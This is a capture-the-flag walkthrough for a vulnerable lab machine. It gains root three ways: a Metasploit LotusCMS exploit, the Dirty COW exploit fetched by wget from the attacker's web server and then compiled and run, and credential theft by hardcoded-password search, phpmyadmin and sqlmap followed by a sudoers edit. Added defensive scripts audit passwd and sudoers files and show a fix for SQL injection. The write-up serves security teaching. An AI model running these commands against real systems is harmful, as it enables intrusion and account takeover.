Machine Info:
- Difficulty: Easy
- Goal: Gain root access
Network Scanning
Netdiscover
As in the previous write-ups, we start by running netdiscover to find the target's IP address on the host-only adapter interface (eth1).
netdiscover -i eth1
Nmap
Then we run nmap against all ports to discover the open ports and the services behind them.
nmap -p- -A 192.168.56.118
Enumeration
Enumerating HTTP service
From the nmap output we found two open ports: SSH on 22 and HTTP on 80. We start with the HTTP service on port 80 and browse to the website to see what is running there.
We found an admin login page, and the site is powered by LotusCMS. So let's look for any public exploits for "LotusCMS".
Exploitation
We use searchsploit to look for available exploits for "LotusCMS" (a web search works as well). We found 18565.rb, which is part of the Metasploit Framework.
searchsploit LotusCMS
We run msfconsole, search for "LotusCMS", select the exploit that was found, set the required options and run it.
msfconsole
search LotusCMS
use 0
options
set RHOSTS 192.168.56.118
set URI /index.php?system=Admin
run
After running the exploit we get a meterpreter session. We drop into a shell and upgrade it to an interactive TTY shell with Python. We are now in as the www-data user, so the next step is privilege escalation.
sysinfo
shell
python -c 'import pty; pty.spawn("/bin/bash")'
id
Privilege Escalation
Method 1: Dirty COW
From the sysinfo output above we know that the target is running Linux kernel 2.6.24, so we use searchsploit to look for public privilege escalation exploits for version "2.6.24". We found 40839.c, an exploit that uses the pokemon.c exploit for the Dirty COW vulnerability as a base and generates a new passwd line. The user is prompted for the new password when the binary is run. The original /etc/passwd file is then backed up to /tmp/passwd.bak and the root account's line is overwritten with the generated one. After running the exploit you should be able to log in as the newly created user. The created user is called "firefart" by default, but you can change it to any username you want.
We downloaded the exploit and served it from a temporary Python web server so that we can fetch it from the target machine.
# Kali linux terminal
searchsploit linux kernel 2.6.24 privilege escalation
searchsploit -m linux/local/40839.c
python -m SimpleHTTPServer
On the target, we download the exploit, compile it and run it.
# target terminal
wget http://192.168.56.157:8000/40839.c
gcc -pthread 40839.c -o 40839 -lcrypt
./40839
Finally, we log in over SSH as the newly created user "firefart" and get a root shell.
# target terminal
ssh firefart@192.168.56.118
cat /etc/passwd
id
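From the defender's side, the footprint this method leaves in /etc/passwd (a UID-0 line that is not root, a hash stored in the passwd file itself, and a copy of the original in /tmp/passwd.bak) is easy to check for. The following audit script is an added example, not part of the original walkthrough; the passwd contents and the hash value are constructed samples.

```python
# Constructed sample: /etc/passwd after the exploit replaced root's line
# (the hash value is a placeholder, not a real crypt hash).
SAMPLE_PASSWD = """\
firefart:PLACEHOLDER_HASH:0:0:pwned:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
loneferret:x:1000:100::/home/loneferret:/bin/bash
dreg:x:1001:1001::/home/dreg:/bin/bash
"""

# Constructed sample: the copy the exploit leaves in /tmp/passwd.bak.
SAMPLE_BACKUP = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
loneferret:x:1000:100::/home/loneferret:/bin/bash
dreg:x:1001:1001::/home/dreg:/bin/bash
"""


def parse_passwd(text):
    """Map username -> (password field, uid) for each well-formed 7-field line."""
    users = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            continue  # blank, comment or malformed line
        users[fields[0]] = (fields[1], int(fields[2]))
    return users


def audit_passwd(current, backup=None):
    """Return a sorted list of findings for a passwd file (and optional backup)."""
    findings = []
    users = parse_passwd(current)
    for name, (pw, uid) in users.items():
        # Any UID-0 account is root-equivalent; only 'root' should have it.
        if uid == 0 and name != "root":
            findings.append(f"uid-0 account other than root: {name}")
        # A hash in the password field bypasses /etc/shadow entirely.
        if pw not in ("x", "*", "!", ""):
            findings.append(f"password hash stored in passwd: {name}")
    if "root" not in users:
        findings.append("root entry missing")
    if backup is not None:
        # Accounts that existed before but are gone now were overwritten.
        for name in sorted(set(parse_passwd(backup)) - set(users)):
            findings.append(f"present in backup but not in passwd: {name}")
    return sorted(findings)


if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD, SAMPLE_BACKUP):
        print(finding)
```

On a live host, pass the contents of /etc/passwd and, if it exists, /tmp/passwd.bak; the backup file itself is also worth treating as an indicator.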
Method 2: phpmyadmin
Starting from the www-data shell, we look for user accounts on the target machine. We found two users, "loneferret" and "dreg".
tail /etc/passwd
So we go through each of their home directories looking for anything interesting. We found nothing in dreg's directory, but in loneferret's directory there is a "CompanyPolicy.README" file. Opening it, we have an email from the CEO informing loneferret about a newly installed program for editing, creating and viewing files called "ht". So we need to find a way to escalate our privileges to the loneferret user in order to use that program.
cd /home
ls
cd dreg
ls
cd ..; cd loneferret
ls
cat CompanyPolicy.README
We use the following find command to look for hardcoded passwords, and we found a MySQL password "fuckeyou" in "/home/www/kioptrix3.com/gallery/gconfig.php".
find / -maxdepth 5 -name '*.php' -type f -exec grep -Hn password {} \; 2>/dev/null
We go to the gallery directory and read gconfig.php, which contains the gallery database credentials (username: root, password: fuckeyou).
cd /home/www/kioptrix3.com/gallery
cat gconfig.php
We run gobuster to confirm that there is a phpmyadmin directory on the target web server, which we will use to log in to the MySQL database.
gobuster dir --url http://192.168.56.118/ -w /usr/share/wordlists/dirb/common.txt
We go to the phpmyadmin login page and enter the credentials we found (root:fuckeyou).
After logging in, we open the gallery database, then the dev_accounts table, and click the Browse tab; there we find the users and their password hashes.
We then cracked the password hashes of both users using the crackstation website.
We log in over SSH as loneferret and run the installed program "ht" with sudo.
ssh loneferret@192.168.56.118
id
pwd
ls
cat CompanyPolicy.README
export TERM=xterm
sudo ht
When ht opens, we press F3 to enter the file we want to edit. We enter /etc/sudoers, the file that lists which users may run which commands as root.
We add "/bin/sh" at the end of the loneferret line so that we can run "sh" and get a shell as root. Then we press F10 to save and exit.
Now we run /bin/sh with sudo and get a root shell.
sudo /bin/sh
id
Method 3: sqlmap
We start again from the www-data shell. We run gobuster to find the directories available on the target website, and /gallery looks interesting.
gobuster dir --url http://192.168.56.118/ -w /usr/share/wordlists/dirb/common.txt
So let's browse to the website to see what the gallery page looks like. Before that, we need to add the target IP address to our local /etc/hosts file so that the site's domain name resolves to it.
vi /etc/hosts
After editing /etc/hosts, the gallery page is as depicted below. We click on Ligoat Press Room and then select "photo id" from the sort options list.
The URL now has two parameters, "id" and "sort". We add a single quote to the id parameter and notice that it is injectable.
So we run Burp Suite to intercept the request and save it to a file (for example, request.txt) so that we can use it with sqlmap later.
We open request.txt and add an asterisk to the parameter we want to inject, which is id in our case.
vi request.txt
We use sqlmap to automate the SQL injection. We run the following command to list the databases, and we found the gallery database.
sqlmap -r request.txt --risk=3 --level=5 --dbs --batch
Then we list the tables of the gallery database; the dev_accounts table looks interesting.
sqlmap -r request.txt --risk=3 --level=5 -D gallery --tables --batch
Then we dump the columns of the dev_accounts table and get the two users "dreg" and "loneferret" and their passwords.
sqlmap -r request.txt --risk=3 --level=5 -D gallery -T dev_accounts --dump --batch
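The root cause here is that the gallery page builds its SQL from the id and sort parameters as raw text. The following added example (not the gallery's own code, which is PHP) shows that pattern beside its fix against an in-memory sqlite3 table with constructed rows: the value is passed as a bind parameter, and the sort column, which cannot be bound, is taken from an allowlist. Table and column names are assumed.

```python
import sqlite3

# Allowlist mapping the user-facing sort key to a real column (column names assumed).
ALLOWED_SORT = {"id": "id", "filename": "filename"}

def make_db():
    """In-memory stand-in for the gallery database, with constructed rows."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE photos (id INTEGER, filename TEXT, gallery TEXT);
        INSERT INTO photos VALUES (1, 'a.jpg', 'press'), (2, 'b.jpg', 'press'),
                                  (3, 'c.jpg', 'private');
    """)
    return con

def vulnerable_query(con, photo_id, sort):
    # Both parameters are spliced into the statement text, so a stray quote in
    # id changes the SQL itself: this is what the single-quote test reveals
    # and what sqlmap then automates.
    sql = (f"SELECT id, filename FROM photos WHERE gallery = 'press' "
           f"AND id = '{photo_id}' ORDER BY {sort}")
    return con.execute(sql).fetchall()

def hardened_query(con, photo_id, sort):
    # The value travels as a bind parameter; the identifier must come from the
    # allowlist because ORDER BY columns cannot be bound.
    try:
        pid = int(photo_id)
    except ValueError:
        raise ValueError("id must be an integer")
    column = ALLOWED_SORT.get(sort)
    if column is None:
        raise ValueError("unsupported sort key")
    sql = (f"SELECT id, filename FROM photos WHERE gallery = 'press' "
           f"AND id = ? ORDER BY {column}")
    return con.execute(sql, (pid,)).fetchall()

def probe(query_fn, photo_id, sort):
    """Run one query function on a fresh db; report ('ok', rows) or ('error', type)."""
    con = make_db()
    try:
        return ("ok", query_fn(con, photo_id, sort))
    except (sqlite3.Error, ValueError) as exc:
        return ("error", type(exc).__name__)

if __name__ == "__main__":
    # The single-quote test from the walkthrough: the raw query breaks inside
    # the database, the hardened one rejects the input before it gets there.
    print(probe(vulnerable_query, "1'", "id"))
    print(probe(hardened_query, "1'", "id"))
```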
Then, as in method 2, we log in over SSH as loneferret and run the installed program "ht" with sudo.
ssh loneferret@192.168.56.118
id
ls
cat CompanyPolicy.README
sudo ht
export TERM=xterm
sudo ht
We press F3 and enter /etc/sudoers to open it. That file lists which users may run which commands as root.
Once the file is open, we add /bin/sh at the end of the loneferret line so that we can run a shell as root.
Now we run /bin/sh with sudo and get a root shell.
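Methods 2 and 3 both end the same way: a sudo rule for an editor is as good as a rule for ALL, because the editor can rewrite /etc/sudoers itself. The audit below is an added example, not part of the original walkthrough; it parses sudoers user specifications and flags rules that allow an editor or shell. The sudoers lines are constructed (the path of ht is assumed), showing the loneferret rule before and after "/bin/sh" is appended.

```python
import os
import re

# Programs that let their sudo user write any file or reach a shell, so a rule
# naming one of them is effectively "ALL".
EDITORS_AND_SHELLS = {"ht", "vi", "vim", "nano", "sh", "bash", "dash"}

# Constructed sudoers: the loneferret rule as the walkthrough describes it
# (the ht path is assumed), before and after "/bin/sh" was appended.
SUDOERS_BEFORE = """\
Defaults env_reset
root ALL=(ALL) ALL
loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
"""
SUDOERS_AFTER = SUDOERS_BEFORE.rstrip("\n") + ", /bin/sh\n"

# user host=(runas) TAG: cmd, cmd ...   (runas and tags are optional)
SPEC_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+?)\s*=\s*(?:\([^)]*\)\s*)?(?P<rest>.*)$")
TAG_RE = re.compile(r"^([A-Z]+):\s*")

def parse_rules(text):
    """Yield (user, tags, [commands]) for each user specification line."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "Defaults")):
            continue
        m = SPEC_RE.match(line)
        if not m:
            continue
        rest, tags = m.group("rest"), set()
        while (t := TAG_RE.match(rest)):
            tags.add(t.group(1))
            rest = rest[t.end():]
        commands = [c.strip() for c in rest.split(",") if c.strip()]
        yield m.group("user"), tags, commands

def audit_sudoers(text):
    """Return (user, command, nopasswd) for every allowed editor or shell rule."""
    findings = []
    for user, tags, commands in parse_rules(text):
        for cmd in commands:
            if cmd.startswith("!") or cmd == "ALL":
                continue  # negated entries forbid rather than allow; ALL is explicit
            program = os.path.basename(cmd.split()[0])
            if program in EDITORS_AND_SHELLS:
                findings.append((user, cmd, "NOPASSWD" in tags))
    return findings
```

Running audit_sudoers over the "before" sample already flags the ht rule, which is the finding an administrator would want before the shell gets appended.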